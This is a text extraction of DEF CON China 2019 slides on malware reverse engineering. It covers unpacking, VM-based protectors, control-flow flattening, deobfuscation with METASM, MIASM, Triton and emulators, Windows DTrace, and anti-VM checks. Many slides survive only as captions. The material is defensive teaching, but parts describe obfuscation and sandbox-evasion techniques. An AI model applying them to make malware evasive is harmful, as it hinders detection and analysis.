ASPack, Armadillo, Petite, FSG, UPX, MPRESS, NSPack, PECompact, WinUnpack and so on.
For most of them, it is easy to write scripts to unpack them.
We also know the main API functions, which are used to create and allocate memory such
as:
VirtualAlloc/Ex( )
HeapCreate( ) / RtlCreateHeap( )
HeapReAlloc( )
GlobalAlloc( )
RtlAllocateHeap( )
Additionally, we know how to unpack them using debuggers, breakpoints and dumping
unpacked content from memory. Furthermore, pe-sieve from Hasherezade is excellent.
When we realize that the malware use some customized packing techniques, it is still
possible to dump it from memory, fix the ImageAddress field using few lines in Python and
its respective IAT using impscan plugin to analyze it in IDA Pro:
export VOLATILITY_PROFILE=Win7SP1x86
python vol.py -f memory.vmem procdump -p 2096 -D . --memory (to keep slack space)
python vol.py -f memory.vmem impscan --output=idc -p 2096
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
5. DEF CON CHINA 1.0 (2019) 5
//#############################################################
// FileName : dumpexe.txt (first draft)
// Comment : Dump memory segments containing executables
// Author : Alexandre Borges
// Date : today
//#############################################################
entry:
msg "Program to dump modules containing executables."
msg "You must be at EP before continuing"
bc // Clear existing breakpoints
bphwc // Clear existing hardbreakpoints
bp VirtualAlloc // Set up a breakpoint at VirtualAlloc
erun // run and pass all first exceptions to the application
core:
sti // Single-step
sti // Single-step
sti // Single-step
sti // Single-step
sti // Single-step
x64dbg
script
1/3
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
6. DEF CON CHINA 1.0 (2019) 6
find cip,"C2 1000“ // find the return point of VirtualAlloc
bp $result // set a breakpoint
erun // run and pass all first exceptions to the application
cmp eax,0 // test if eax (no allocated memory) is equal to zero
je pcode // jump to pcode label
bpm eax,0,x // set executable memory breakpoint and restore it once hit.
erun // run and pass all first exceptions to the application
//try to find if there is the “This program” string within the module’s memory.
findall $breakpointexceptionaddress,"546869732070726F6772616D”
cmp $result,0 // check if there isn’t any hit
je pcode // jump to pcode label
$dumpaddr = mem.base($breakpointexceptionaddress) //find the memory base.
$size = mem.size($breakpointexceptionaddress) //find the size of memory base.
savedata :memdump:,$dumpaddr,$size //dump the segment.
msgyn "Memory dumped! Do you want continue?“ //show a dialog
cmp $result,1 //check your choice
je scode // jump to scode label
bc // clear existing breakpoints
bphwc // clear existing hardware breakpoints
ret // exit
x64dbg
script 2/3
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
7. DEF CON CHINA 1.0 (2019) 7
pcode:
msgyn "There isn't a PE file! Do you want continue?"
cmp $result,0 // check if we don’t want continue
je final
sti //single step.
erun // run and pass all first exceptions to the application
jmp core // jump to core label
scode:
msg "Let's go to next dump“ // shows a message box
erun // run and pass all first exceptions to the application
jmp core // jump to core label
final:
bc // clear existing breakpoints
bphwc // clear existing hardware breakpoints
ret // exit
x64dbg
script 3/3
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
9. DEF CON CHINA 1.0 (2019
9
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Obfuscation aims to protect software of being reversed, intellectual property and,
in our case, malicious code too. Honestly, obfuscation does not really protect
the program, but it can make the reverser’s life harder than usual.
Thus, at end, obfuscation buys time by enforcing reversers to spend resources and
time to break a code.
We see obfuscated code every single day when we analyze commom userland
malware, droppers written in VBA and Powershell, so it mightn’t seem to be a big
deal.
We can use IDA Pro SDK to write plugins to extend the IDA Pro functionalities,
analyze some code and data flow and even automatizing unpacking of strange
malicious files.
Additionally, if you are facing problems to analyze a modified MBR, so you could
even write a loader to load the MBR structure and analyze it in IDA Pro.
Unfortunately, there are packers and protectors such as VMprotect, Themida, Arxan
and Agile .NET that use modern obfuscation techniques, so making the procedure
of reversing a code very complicated.
10. DEF CON CHINA 1.0 (2019) 10
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Most protectors have used with 64-bit code (and malware).
Original IAT is removed from the original code (as usually applied by any
packer). However, IAT from packers like Themida keeps only one function
(TlsSetValue).
Almost all of them provide string encryption.
They protect and check the memory integrity. Thus, it is not possible to
dump a clean executable from the memory (using Volatility, for example)
because original instructions are not decoded in the memory.
Instructions (x86/x64 code) are virtualized and transformed into virtual
machine instructions (RISC instructions).
.NET protectors rename classes, methods, fields and external references.
11. DEF CON CHINA 1.0 (2019) 11
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Some packers can use instruction encryption on memory as additional
memory layer.
Obfuscation is stack based, so it is hard to handle virtualized code statically.
Virtualized code is polymorphic, so there are many representations
referring the same CPU instruction.
There are also fake push instructions.
There are many dead and useless codes.
There is some code reordering using unconditional jumps.
All obfuscators use code flattening.
Packers have few anti-debugger and anti-vm tricks. However, few months
ago, I saw a not so common anti-virtual machine trick based on
temperature (more about it later).
12. DEF CON CHINA 1.0 (2019) 12
int defcon(int x)
“Virtualizer”
(bytecodes)
vm_call_1(opcodes, x)
Fetches bytes, decodes
them to instructions and
dispatches them to handlers
Protectors using virtual machines introduces into the obfuscated code:
A context switch component, which “transfers” registry and flag information into VM
context (virtual machine). The oposite movement is done later from VM machine and
native (x86/x64) context (suitable to keep within C structures during unpacking
process )
This “transformation” from native register to virtualized registers can be one to one,
but not always.
Inside of the virtual machine, the cycle is:
fetch instruction
decode it
find the pointer to instruction and lookup the associate opcode in a handler table
call the target handler
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
13. DEF CON CHINA 1.0 (2019)
13
Few interesting concepts:
Fetching: the instruction to be executed by Virtual Machine is
fetched.
Decoding: the target x86 instruction is decoded using rules from
Virtual Machine (remember: usually, the architecture is usually based
on RISC instructions)
Dispatcher: Once the handler is determined, so jump to the suitable
handler. Dispatchers could be made by a jump table or switch case
structure.
Handler: In a nutshell, a handler is the implementation of the Virtual
Machine instruction set.
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
14. DEF CON CHINA 1.0 (2019) 14
B C HD
DISPATCHER
A IGFE
2
3
Instruction
decoder
Instruction
A, B, C, ... are handlers such as
handler_add, handler_sub,
handler_push...
Opcodes from a custom
instruction set.
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Initialization
Fetch
Decode
RVA RVA + process base
address and other tasks.
Instructions are stored in an
encrypted format.
15. DEF CON CHINA 1.0 (2019) 15
opcode 1
opcode 2
opcode 3
opcode 4
opcode 7
opcode 5
opcode 6
handler 1
handler 2
handler 3
handler 4
handler 7
handler 5
handler 6
function pointer 1
function pointer 2
function pointer 3
function pointer 4
function pointer 7
function pointer 5
function pointer 6
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
function pointer table
(likely encrypted)
encr_1 encr_nencr_2 encr_3 encr_5 encr_4 ...
1 2 3 4 5 n-1 n
vm_add vm_nvm_sub vm_xor vm_push vm_pop ...
decrypted
instructions
encrypted
instructions
indexes
recovering and
decrypting funcions
16. DEF CON CHINA 1.0 (2019) 16
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Constant unfolding: technique used by obfuscators to replace a contant by
a bunch of code that produces the same resulting constant’s value.
Pattern-based obfuscation: exchange of one instruction by a set of
equivalent instructions.
Abusing inline functions.
Anti-VM techniques: prevents the malware sample to run inside a VM.
Dead (garbage) code: this technique is implemented by inserting codes
whose results will be overwritten in next lines of code or, worse, they
won’t be used anymore.
Code duplication: different paths coming into the same destination (used
by virtualization obfuscators).
17. DEF CON CHINA 1.0 (2019) 17
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Control indirection 1: call instruction stack pointer update
return skipping some junk code after the call instruction (RET x).
Control indirection 2: malware trigger an exception registered
exception is called new branch of instructions.
Opaque predicate: Although apparently there is an evaluation
(conditional jump: jz/jnz), the result is always evaluated to true (or
false), which means an unconditional jump. Thus, there is a dead
branch.
Anti-debugging: used as irritating techniques to slow the process
analysis.
Polymorphism: it is produced by self-modification code (like
shellcodes) and by encrypting resources (similar most malware
samples).
18. DEF CON CHINA 1.0 (2019) 18
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
It is quick to create a simple IDA Pro plugin. Download the IDA SDK from
https://www.hex-rays.com/products/ida/support/download.shtml (likely, you will
need a professional account). Copy it to a folder (idasdk695/) within the IDA Pro
installation directory.
Create a project in Visual Studio 2017 (File New Create Project Visual C++
Windows Desktop Dynamic-Link Library (DLL)).
Change few project properties as shown in this slide and next ones.
19. DEF CON CHINA 1.0 (2019) 19
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Include the “__NT__;__IDP__” in Processor Definitions and change Runtime
Library to “Multi-threaded” (MT) (take care: it is NOT /MTd).
20. DEF CON CHINA 1.0 (2019) 20
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Add ida.lib (from C:Program Files (x86)IDA 6.95idasdk695libx86_win_vc_32)
to Additional Dependencies and its folder to Additional Library Directories.
Add “/EXPORT:PLUGIN” to Additional Options.
21. DEF CON CHINA 1.0 (2019) 21
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Don’t forget necessary headers.
Initialization function.
Make the plugin available to this idb and keep the plugin
loaded in memory.
Clean-up tasks.
Function to be called when user activates the plugin.
Simple (and incomplete) URL regex.
22. DEF CON CHINA 1.0 (2019) 22
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Plugin will be activated by
combination ALT-X.
Plugin structure.
The core logic is only it. It checks
whether the string matches to the
URL regex.
If checks, so ea == strinfo.ea.
It gets the number of
strings from “Strings view”.
It gets the string.
23. DEF CON CHINA 1.0 (2019) 23
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
URLs found within this malicious driver.
ALT + X
24. DEF CON CHINA 1.0 (2019) 24
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
decodes instructions and
fill structures with the
result (ana.cpp)
IDA processor modules continue being the
one of best approach to handle virtualized
packers.
Please, you should remember on few
important points (as mentioned by Ilfak
from Hex-Rays) about how to write an IDA
processor modules:
processes the commands
decoded by analyser
(amu.cpp)
creates cross-references.
tracks the register content.
tracks the register content.
Writes the output a
handled output
containing prefix,
comments and xrefs
(out.cpp)
write a
analyser
Modify (or
write) an
emulator
write a
outputter
The IDA Pro SDK documentation and
samples are always great.
Processor
Module
25. DEF CON CHINA 1.0 (2019) 25
#include <stdio.h>
int main (void)
{
int aborges = 0;
while (aborges < 30)
{
printf(“%dn”, aborges);
aborges++;
}
return 0;
}
Loading libs
aborges = 0
aborges < 30
printf( )
aborges++
return 0
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
26. DEF CON CHINA 1.0 (2019) 26
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Original Program
27. DEF CON CHINA 1.0 (2019) 27
cc = 1 cc != 0
switch(cc)
aborges < 30
cc = 0 cc = 3
break
aborges = 0
cc = 2
break
printf
aborges++
break
cc = 2
loading libs
cc = 1
cc = 2
cc = 3
Disavantages:
Loss of performance
Easy to identify the CFG flattening
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
28. DEF CON CHINA 1.0 (2019) 28
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
The obfuscator-llvm is an excellent project to be used for code obsfuscation. To
install it, it is recommended to add a swap file first (because the linkage stage):
fallocate -l 8GB /swapfile
chmod 600 /swapfile
mkswap /swapfile
swapon /swapfile
swapon --show
apt-get install llvm-4.0
apt-get install gcc-multilib (install gcc lib support to 32 bit)
git clone -b llvm-4.0 https://github.com/obfuscator-llvm/obfuscator.git
mkdir build ; cd build/
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_INCLUDE_TESTS=OFF
../obfuscator/
make -j7
Possible usages:
./build/bin/clang alexborges.c -o alexborges -mllvm -fla
./build/bin/clang alexborges.c -m32 -o alexborges -mllvm -fla
./build/bin/clang alexborges.c -o alexborges -mllvm -fla -mllvm -sub
29. DEF CON CHINA 1.0 (2019) 29
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Main dispatcher
Prologue and
initial assignment
30. DEF CON CHINA 1.0 (2019) 30
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Main blocks
from the
program
31. DEF CON CHINA 1.0 (2019) 31
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
General overview
of the obfuscated code
32. DEF CON CHINA 1.0 (2019) 32
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
33. DEF CON CHINA 1.0 (2019) 33
.text:00401000 loc_401000: ; CODE XREF: _main+Fp
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 xor eax, eax
.text:00401005 jz short near ptr loc_40100D+1
.text:00401007 jnz near ptr loc_40100D+4
.text:0040100D
.text:0040100D loc_40100D: ; CODE XREF: .text:00401005j
.text:0040100D ; .text:00401007j
.text:0040100D jmp near ptr 0D0A8837h
Simple opaque predicate and anti-disassembly technique
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
34. DEF CON CHINA 1.0 (2019) 34
Decrypted
shellcode
Decryption
instructions
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
35. DEF CON CHINA 1.0 (2019) 35
00401040 call + $5
00401045 pop ecx
00401046 inc ecx
00401047 inc ecx
00401048 add ecx, 4
00401049 add ecx, 4
0040104A push ecx
0040104B ret
0040104C sub ecx, 6
0040104D dec ecx
0040104E dec ecx
0040104F jmp 0x401320
Call stack manipulation:
Do you know what’s
happening here?
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
37. DEF CON CHINA 1.0 (2019) 37
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
sub eax, B9
add eax,ecx
add eax, B9
sub eax, B9
sub eax, 86
add eax,ecx
add eax, 86
push edx
mov edx, 42
inc edx
dec edx
add edx, 77
add eax, edx
pop edx
push ebx
mov ebx, B9
sub eax, ebx
pop ebx
sub eax, 55
sub eax, 32
add eax, ecx
add eax, 50
add eax, 37
push edx
push ecx
mov ecx, 49
mov edx, ecx
pop ecx
inc edx
add edx, 70
dec edx
add eax, edx
pop edx
add eax, ecx
1
2
3
4
How to reverse the obfuscation and, from stage 4, to return
to the stage 1?
38. DEF CON CHINA 1.0 (2019) 38
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
METASM works as disassembler, assembler, debugger, compiler and linker.
Key features:
Written in Ruby
C compiler and decompiler
Automatic backtracking
Live process manipulation
Supports the following architecture:
Intel IA32 (16/32/64 bits)
PPC
MIPS
Supports the following file format:
MZ and PE/COFF
ELF
Mach-O
Raw (shellcode)
root@kali:~/programs# git clone https://github.com/jjyg/metasm.git
root@kali:~/programs# cd metasm/
root@kali:~/programs/metasm# make
root@kali:~/programs/metasm# make all
Include the following line into .bashrc file to indicate the Metasm directory installation:
export RUBYLIB=$RUBYLIB:~/programs/metasm
39. DEF CON CHINA 1.0 (2019) 39
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
This instruction was inserted to make the
eax register evaluation easier.
based on metasm.rb file
and Bruce Dang code.
40. DEF CON CHINA 1.0 (2019) 40
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
initialize and disassemble
code since beginning (start).
list the assembly code.
determines which is the final
instruction to walk back from there.
initialize the backtracking engine.
41. DEF CON CHINA 1.0 (2019) 41
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Backtracking from the last instruction.
Show only the effective instructions,
which really can alter the final result.
logs the sequence of
backtracked instructions.
42. DEF CON CHINA 1.0 (2019) 42
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Remember: this is our obfuscated code.
43. DEF CON CHINA 1.0 (2019) 43
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
44. DEF CON CHINA 1.0 (2019) 44
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Game over.
45. DEF CON CHINA 1.0 (2019) 45
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Output originated from backtracing_log.select
command (in reverse)
46. DEF CON CHINA 1.0 (2019) 46
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Emulation is always an excellent method to solve practical reverse engineering problems
and , fortunately, we have the uEmu and also could use the Keystone Engine assembler and
Capstone Engine disassembler.
Keystone Engine acts an assembler and:
Supports x86, Mips, Arm and many other architectures.
It is implemented in C/C++ and has bindings to Python, Ruby, Powershell and C#
(among other languages).
Installing Keystone:
root@kali:~/Desktop# wget https://github.com/keystone-engine/keystone/archive/0.9.1.tar.gz
root@kali:~/programs# cp /root/Desktop/keystone-0.9.1.tar.gz .
root@kali:~/programs# tar -zxvf keystone-0.9.1.tar.gz
root@kali:~/programs/keystone-0.9.1# apt-get install cmake
root@kali:~/programs/keystone-0.9.1# mkdir build ; cd build
root@kali:~/programs/keystone-0.9.1/build# apt-get install time
root@kali:~/programs/keystone-0.9.1/build# ../make-share.sh
root@kali:~/programs/keystone-0.9.1/build# make install
root@kali:~/programs/keystone-0.9.1/build# ldconfig
root@kali:~/programs/keystone-0.9.1/build# tail -3 /root/.bashrc
export PATH=$PATH:/root/programs/phantomjs-2.1.1-linux-x86_64/bin:/usr/local/bin/kstool
export RUBYLIB=$RUBYLIB:~/programs/metasm
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib
47. DEF CON CHINA 1.0 (2019) 47
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
instructions from the
original obsfuscated code
Creating a keystone engine
Assembling our instructions
using keystone engine.
Freeing memory
and closing engine.
48. DEF CON CHINA 1.0 (2019) 48
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
49. DEF CON CHINA 1.0 (2019) 49
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
To install Capstone: apt-get install libcapstone3 libcapstone-dev
50. DEF CON CHINA 1.0 (2019) 50
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Original code disassembled
by Capstone.
51. DEF CON CHINA 1.0 (2019) 51
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
IDA Pro confirms our
disassembly task.
52. DEF CON CHINA 1.0 (2019) 52
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
set up before
running uEmu
This result confirms our previous conclusion.
Download uEmu from https://github.com/alexhude/uEmu
Install Unicorn: pip install unicorn.
Load uEmu in IDA using ALT+F7 hot key.
Right click the code and choose the uEmu sub-menu.
53. DEF CON CHINA 1.0 (2019) 53
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
# git clone https://github.com/unicorn-engine/unicorn.git
# cd unicorn ; ./make.sh
# ./make.sh install
54. DEF CON CHINA 1.0 (2019) 54
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
55. DEF CON CHINA 1.0 (2019) 55
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
56. DEF CON CHINA 1.0 (2019) 56
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
57. DEF CON CHINA 1.0 (2019) 57
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
58. DEF CON CHINA 1.0 (2019) 58
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
59. DEF CON CHINA 1.0 (2019) 59
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
61. DEF CON CHINA 1.0 (2019) 61
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
MIASM is one of most impressive framework for reverse engineering, which is able to
analyze, generate and modify several different types of programs.
MIASM supports assembling and disassembling programs from different platforms such as
ARM, x86, MIPS and so on, and it also is able to emulate by using JIT.
Therefore, MIASM is excellent to de-obfuscation.
Installing MIASM:
git clone https://github.com/serpilliere/elfesteem.git elfesteem
cd elfesteem/
python setup.py build
python setup.py install
apt-get install clang texinfo texi2html
apt-get remove libtcc-dev
apt-get install llvm
cd ..
git clone http://repo.or.cz/tinycc.git
cd tinycc/
git checkout release_0_9_26
./configure --disable-static
make
make install
62. DEF CON CHINA 1.0 (2019) 62
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
pip install llvmlite
apt-get install z3
apt-get install python-pycparser
git clone https://github.com/cea-sec/miasm.git
root@kali:~/programs/miasm# python setup.py build
root@kali:~/programs/miasm# python setup.py install
root@kali:~/programs/miasm/test# python test_all.py
apt-get install graphviz
apt-get install xdot
(testing MIASM) root@kali:~/programs# python
/root/programs/miasm/example/disasm/full.py -m x86_32 /root/programs/shellcode
INFO : Load binary
INFO : ok
INFO : import machine...
INFO : ok
INFO : func ok 0000000000001070 (0)
INFO : generate graph file
INFO : generate intervals
[0x1070 0x10A2]
INFO : total lines 0
(testing MIASM) xdot graph_execflow.dot
63. DEF CON CHINA 1.0 (2019) 63
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
64. DEF CON CHINA 1.0 (2019) 64
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Opens our file. The Container provides
the byte source to the disasm engine.
Instantiates the assemble engine using
the x86 32-bits architecture.
Runs the recursive transversal
disassembling since beginning.
Generates a dot graph.
Set “llvm” as Jit engine to
emulation and initialize the stack.
Set the virtual start
address, register values and
memory protection.
Adds a breakpoint at
the last line of code.
Run the emulation.
65. DEF CON CHINA 1.0 (2019) 65
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Disassembling our code (again)
66. DEF CON CHINA 1.0 (2019) 66
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
67. DEF CON CHINA 1.0 (2019) 67
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Our proposed code.
68. DEF CON CHINA 1.0 (2019) 68
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Get the IRA converter.
Initialize and run the Symbolic
Execution Engine.
69. DEF CON CHINA 1.0 (2019) 69
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
70. DEF CON CHINA 1.0 (2019) 70
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
The same conclusion from
our previous tests.
72. ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
DEF CON CHINA 1.0 (2019)
72
TRITON
It can be downloaded from https://triton.quarkslab.com/
Based on Intel Pin instrumentation tool: https://software.intel.com/en-
us/articles/pin-a-dynamic-binary-instrumentation-tool
Triton offers a C/C++/Python interface provides:
dynamic symbolic execution
run time registry information and memory modification
taint engine
Z3 interface to handle contraints
snapshot engine (it is not necessary to restart the program every time,
but only restores memory and register states)
access to Pin funtions
symbolic fuzzing
gather code coverage
Supports x86 and x64 architecture.
73. ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
DEF CON CHINA 1.0 (2019)
73
Triton supports:
symbolic execution mode:
emulates instruction effects.
allows us to emulate only part of the program (excellent for
analyzing branches).
concolic execution mode:
allows us to analyze the program only from start.
Taint analysis is amazing because we are able to using in fuzzing tasks to
know what registers and memory address are “affected” by the user data
input.
During Virtual Machine’s decoding, it is interesting to distinguish which
instructions are related to user input and which are not.
74. ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
DEF CON CHINA 1.0 (2019) 74
Installing Triton without Pin (Ubuntu 19):
apt-get install libboost-all-dev
apt-get install libpython-dev
apt-get install libcapstone-dev
Take care: DO NOT install libz3-dev. If this package is already installed,
so remove it.
git clone https://github.com/Z3Prover/z3
cd z3/
python scripts/mk_make.py
cd build/
make
make install
git clone https://github.com/JonathanSalwan/Triton.git
cd Triton/
mkdir build
cd build/
cmake ..
make -j install (my recommendation: 8 GB RAM + 8 GB swapfile)
75. ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
DEF CON CHINA 1.0 (2019) 75
Installing Triton with Pin (Ubuntu 19):
Install the same packages from last slide.
Install Z3 as shown in the last slide.
wget
https://software.intel.com/sites/landingpage/pintool/downloads/pin-
2.14-71313-gcc.4.4.7-linux.tar.gz
tar zxvf pin-2.14-71313-gcc.4.4.7-linux.tar.gz
cd pin-2.14-71313-gcc.4.4.7-linux/source/tools
git clone https://github.com/JonathanSalwan/Triton.git
cd Triton/
mkdir build
cd build
cmake -DPINTOOL=on -DKERNEL4=on ..
make
cd ..
./build/triton ./src/examples/pin/ir.py /usr/bin/host (only to test the
installation).
79. ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
DEF CON CHINA 1.0 (2019) 79
This is an educational way to show how
to find the hexadecimal representation
for each instruction.
However, there are much better ways to
do it by opening the binary on IDA Pro,
Radare2, Ghidra or even using distorm3.
94. DEF CON CHINA 1.0 (2019) 94
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
DTrace is a dynamic tracing framework, which is very efficient and famous on
Solaris operating system.
Dtrace was initially written by Mike Shapiro, Adam Leventhal and Brian Cantrill at
Sun Microsystems. Although they were developing DTrace since 2003, it was only
introduced in Solaris 10 03/05.
It is used to get a real time overview of a system in user and kernel mode.
Furthermore, it can be used to understand how application and systems are
behaving.
Few months ago, DTrace was ported to Windows:
https://github.com/opendtrace/opendtrace/tree/windows
DTrace is could be summarized as a set of probes (sensors) scattered over the key
point in the kernel. Thus, every time that a probe is “activated”, it is possible to
register and understand the application behavior.
Using DTrace makes easier to trace the profile of a process and the system, find
which system calls are “called”, how many bytes are written/read by a process, file
opened by a process, tracing the sequence of called system calls and so on.
95. DEF CON CHINA 1.0 (2019) 95
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
DTrace scripts are written in D language (similar to awk).
Probe names are described by the following syntaxe:
provider:module:function:name
where:
provider: library of probes used to instrument an area of the system. On
Windows, the existing providers are syscall, etw, profile, pid and dtrace.
module: kernel module where we find the probe.
function: function contaning the probe.
name: specific name or description of the target probe.
Key concepts:
predicates: user defined conditions.
actions: tasks that are run when a probe fires.
aggregations: coalesce data using aggregation functions.
96. DEF CON CHINA 1.0 (2019) 96
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
To install DTrace:
Windows 10 x64 (build 18342 or later) from Windows Insider Program.
bcdedit.exe /set dtrace on
Download DTrace package:
http://download.microsoft.com/download/B/D/4/BD4B95A5-0B61-4D8F-
837C-F889AAD8DAA2/DTrace.amd64.msi
_NT_SYMBOL_PATH=srv*C:symbols*https://msdl.microsoft.com/download
/symbols
Reboot the system.
Open a command prompt as administrator.
If you are using fbt (function boundary tracing), so it is necessary to attach
the WinDbg and boot the Windows in debug mode.
97. DEF CON CHINA 1.0 (2019) 97
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
98. DEF CON CHINA 1.0 (2019) 98
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
99. DEF CON CHINA 1.0 (2019) 99
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
100. DEF CON CHINA 1.0 (2019) 100
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
101. DEF CON CHINA 1.0 (2019) 101
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
102. DEF CON CHINA 1.0 (2019) 102
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
103. DEF CON CHINA 1.0 (2019) 103
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
It is possible to use a different type of provider named “fbt” (function boundary
tracing), which tracks the sequence of system calls being executed through the
NTFS in the kernel.
The “fbt” provider only it is available when there is kernel debugger attached to
the Windows 10.
104. DEF CON CHINA 1.0 (2019) 104
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
105. DEF CON CHINA 1.0 (2019) 105
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
106. DEF CON CHINA 1.0 (2019) 106
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Traceext.sys: exposes functionality
used by DTrace to tracing.
107. DEF CON CHINA 1.0 (2019) 107
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
109. DEF CON CHINA 1.0 (2019) 109
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
It is extremely easy writing malware samples using anti-VM techniques designed
to detect VMWare (checking I/O port communication), VirtualBox, Parallels,
SeaBIOS emulator, QEMU emulator, Bochs emulator, QEMU emulator, Hyper-V,
Innotek VirtualBox, sandboxes (Cuckoo).
Furthermore, there are dozens of techniques that could be used for detection
Vmware sandboxes:
Examing the registry (OpenSubKey( ) function) to try to find entries related to
tools installed in the guest
(HKEY_LOCAL_MACHINESOFTWAREMicrosoftVirtualMachineGuestParam
eters).
Using WMI to query the Win32_BIOS management class to interact with
attributes from the physical machine.
We have already know every single anti-VM technique around the world and all of
them are documented.
Most current techniques use WMI and it is quick to write a C# program using
them.
110. DEF CON CHINA 1.0 (2019) 110
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
111. DEF CON CHINA 1.0 (2019) 111
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
The code from last slide does not have any news:
The ManagementClass class represents a Common Information Model
(CIM) management class.
Win32_BIOS WMI class represents the attributes of BIOS and members of
this class enable you to access WMI data using a specific WMI class path.
GetInstances( ) acquires a collection of all instances of the class.
GetEnumerator( ) returns the enumerator (IEnumerator) for the collection.
IEnumerator.Current( ) returns the same object.
IEnumerator.MoveNext( ) advances the enumerator to the next element of
the collection.
Physical host:
C:> Test_VM.exe
Attributes:
Version: DELL - 6222004
SerialNumber: D5965S1
OperatingSystem: 0
Manufacturer: Dell Inc.
Guest virtual machine:
E:> Test_VM.exe
Attributes:
Version: LENOVO - 6040000
SerialNumber: VMware-56 4d 8d c3 a7 c7 e5
2b-39 d6 cc 93 bf 90 28 2d
OperatingSystem: 0
Manufacturer: Phoenix Technologies LTD
112. DEF CON CHINA 1.0 (2019) 112
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
113. DEF CON CHINA 1.0 (2019) 113
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
Double-click the result....
114. DEF CON CHINA 1.0 (2019) 114
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
115. DEF CON CHINA 1.0 (2019)
115
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
116. DEF CON CHINA 1.0 (2019) 116
